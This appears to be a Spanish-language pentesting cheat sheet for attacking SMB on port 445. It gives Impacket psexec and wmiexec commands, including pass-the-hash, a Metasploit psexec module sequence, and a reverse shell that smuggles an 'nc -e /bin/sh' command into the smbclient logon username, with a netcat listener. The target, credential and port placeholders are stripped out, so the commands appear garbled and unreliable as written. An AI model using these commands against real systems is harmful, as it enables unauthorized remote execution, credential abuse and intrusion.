# 445/TCP (SMB) ## Impacket ```shell # impacket-psexec psexec.py :""@ psexec.py /:""@ psexec.py /@ -hashes # impacket-wmiexec wmiexec.py :""@ wmiexec.py /:""@ wmiexec.py /@ -hashes ``` * \ = usuario. * \ = contraseña. * \ = dirección IP del objetivo. * \ = `LMHASH:NTHASH` ## Metasploit ```shell use exploit/windows/smb/psexec set RHOSTS set SMBUser set SMBPass run ``` ## Reverse shell ```shell smbclient ///tmp logon "./=`nohup nc -e /bin/sh

`" nc -lvnp ```